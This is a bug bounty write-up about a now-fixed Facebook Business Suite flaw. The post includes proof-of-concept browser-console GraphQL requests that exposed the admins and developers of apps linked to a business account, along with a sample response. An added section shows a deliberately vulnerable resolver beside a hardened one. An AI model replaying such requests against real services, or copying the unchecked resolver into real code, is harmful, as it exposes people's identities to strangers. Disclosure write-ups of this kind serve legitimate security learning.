PenTester Nepal

Aim to feature infosec, bug bounty, privacy and security awareness articles from Nepali security researchers and bug bounty hunters.

Disclosing assigned users of any facebook applications connected to business account

2 min read · Apr 7, 2023


During mid-April 2021, I found a very new-looking UI of Facebook Business Suite in one of my test Facebook accounts. Within a second, I found new business asset sections added within it.

While analyzing every request and response in the network tab of the dev tools, I found two GraphQL queries named “BizKitSettingsAssetAssignedPeopleModalQuery” and “BizKitSettingsAssetToUserConnectionListPaginationQuery” that were fetching the admin list of my page connected to the business account. At the time of reporting, the call for Facebook pages was secured but was vulnerable for the asset type apps.

Based on the given input for the targeted app and the linked business ID, it was possible to disclose the NonBusinessScopedPermittedUser list of the targeted Facebook app.


Proof of concept

Send the GraphQL requests as AJAX calls from the browser console window.

BizKitSettingsAssetAssignedPeopleModalQuery:

new AsyncRequest('api/graphql/').setData({doc_id:3863660693680109,variables:'{"assetID":"AppID","businessID":"linked_businessID"}'}).send()

BizKitSettingsAssetToUserConnectionListPaginationQuery:

new AsyncRequest('api/graphql/').setData({doc_id:5596978093660601,variables:'{"assetID":"AppID","assetPermissionAccessType":null,"businessID":"linked_businessID","count":100,"cursor":null,"searchTerm":null,"id":"AppID"}'}).send()

Both queries above return the same response:

{
  "data": {
    "asset": {
      "__typename": "Application",
      "__isBusinessConnectedObjectWithPermittedUsers": "Application",
      "assigned_users": {
        "edges": [
          {
            "node": {
              "__typename": "NonBusinessScopedPermittedUser",
              "__isPermittedUser": "NonBusinessScopedPermittedUser",
              "name": "Facebook Name",
              "__module_operation_BizKitSettingsAssetToUserConnectionListItem_user": {
                "__dr": "BizKitSettingsAssetToNonBusinessScopedUserConnectionListItem_user$normalization.graphql"
              },
              "__module_component_BizKitSettingsAssetToUserConnectionListItem_user": {
                "__dr": "BizKitSettingsAssetToNonBusinessScopedUserConnectionListItem.react"
              },
              "id": "FBID"
            },
            "cursor": null
          }
        ],
        "page_info": {
          "end_cursor": "end_cursor",
          "has_next_page": true
        }
      },
      "__isBusinessObjectRenderedInUI": "Application",
      "assetID": "AppID",
      "assetName": "Facebook App Name",
      "assetPicture": "CDN_URL",
      "assetType": "APP",
      "__isNode": "Application",
      "id": "AppID",
      "businessAssetType": "APP"
    }
  },
  "extensions": {
    "is_final": true
  }
}

Impact

This could have let a malicious user disclose the list of admins/developers (NonBusinessScopedPermittedUser) of any app connected to a business account.
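The root cause described above is a missing authorization check on an asset-level query: anyone who could supply an app ID and a business ID got the assigned-user list back. The following is an added example, not code from the original post or from Facebook, showing a minimal GraphQL-style resolver for such a query in a vulnerable form next to a hardened one. The business and app records, user names, IDs and function names are all constructed for the example; the hardened resolver assumes that the viewer must hold a role on the business named in the request and that the business must actually own the requested asset.

```javascript
// Added example (not from the original post): a minimal resolver for an
// "assigned users of an app" query, in a vulnerable and a hardened form.
// All data below is constructed; names, IDs and function names are assumptions.

// Constructed business-manager state: who administers each business and
// which apps each business owns.
const BUSINESSES = {
  'biz-100': { admins: new Set(['user-alice']), apps: new Set(['app-1']) },
  'biz-200': { admins: new Set(['user-carol']), apps: new Set(['app-2']) },
};

// Constructed apps with their assigned users (the NonBusinessScopedPermittedUser
// entries that the response on the page exposes).
const APPS = {
  'app-1': {
    name: 'Alice Shop App',
    assignedUsers: [
      { id: 'user-alice', name: 'Alice' },
      { id: 'user-bob', name: 'Bob (developer)' },
    ],
  },
  'app-2': {
    name: 'Carol CRM App',
    assignedUsers: [{ id: 'user-carol', name: 'Carol' }],
  },
};

class AuthorizationError extends Error {}

// Shapes the result like the assigned_users connection in the page's response.
function toConnection(app, assetID) {
  return {
    asset: {
      __typename: 'Application',
      assetID,
      assetName: app.name,
      assetType: 'APP',
      assigned_users: {
        edges: app.assignedUsers.map((u) => ({
          node: { __typename: 'NonBusinessScopedPermittedUser', id: u.id, name: u.name },
          cursor: null,
        })),
        page_info: { end_cursor: null, has_next_page: false },
      },
    },
  };
}

// Vulnerable form: looks the asset up by ID and returns its assigned users to
// any logged-in viewer. The businessID is accepted but never checked, and the
// viewer is never tied to the business or to the app.
function vulnerableAssignedUsers(viewerId, { assetID, businessID }) {
  const app = APPS[assetID];
  if (!app) return null;
  return toConnection(app, assetID);
}

// Hardened form, two checks in a fixed order:
//  1. the viewer must administer the business named in the request; an unknown
//     business and a non-member get the same refusal, so the query does not
//     reveal whether a business ID exists;
//  2. the business must own the requested asset. Checking only the viewer's
//     role would let a caller pair their own businessID with someone else's
//     assetID, so both checks are needed.
function hardenedAssignedUsers(viewerId, { assetID, businessID }) {
  const business = BUSINESSES[businessID];
  if (!business || !business.admins.has(viewerId)) {
    throw new AuthorizationError('viewer has no role on this business');
  }
  const app = APPS[assetID];
  if (!app || !business.apps.has(assetID)) return null; // not an asset of this business
  return toConnection(app, assetID);
}

// Collects the names a viewer can read through a given resolver, or 'denied'
// when the request was refused. Used to compare the two forms.
function namesVisibleTo(resolver, viewerId, args) {
  try {
    const result = resolver(viewerId, args);
    return result ? result.asset.assigned_users.edges.map((e) => e.node.name) : [];
  } catch (err) {
    if (err instanceof AuthorizationError) return 'denied';
    throw err;
  }
}

// Stand-alone run: an outsider gets the full list from the vulnerable form
// and a refusal from the hardened form.
const probe = { assetID: 'app-1', businessID: 'biz-100' };
console.log('vulnerable:', namesVisibleTo(vulnerableAssignedUsers, 'user-mallory', probe));
console.log('hardened:  ', namesVisibleTo(hardenedAssignedUsers, 'user-mallory', probe));
```

The same shape applies to any business-connected asset type: the fix is not a check on the business ID alone, nor on the asset ID alone, but on the relationship between the viewer, the business and the asset. Returning a uniform refusal before the asset lookup also keeps the endpoint from acting as an ID oracle for outsiders.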

Timeline

  • 22 Apr, 2021 — Report sent to Facebook.
  • 22 Apr, 2021 — Triaged after 4 hours of submission.
  • 15 July, 2021 — Incomplete fix by Facebook.
  • 26 Aug, 2021 — Bounty awarded by Facebook.
  • 20 Jan, 2022 — Complete fix by Facebook.
  • 27 Jan, 2022 — Double bounty awarded by Facebook for the incomplete fix, with a delayed-payout bonus.

After multiple duplicates and informative reports, this report turned out to be my first bounty reward from Facebook.

You know that feeling when you get your first bounty ?💰️

Your heart starts racing. You keep going back, chasing that feeling over and over again.🚀

Thanks for reading my write-up 🤗 Happy Hacking 🎭️

Thanks & best regards,
Gtm Mänôz

Linkedin: https://linkedin.com/in/gtm0x01

Twitter: https://www.twitter.com/gtm0x01/

Facebook: https://www.facebook.com/gtm0x01

Instagram: https://www.instagram.com/gtm0x01/
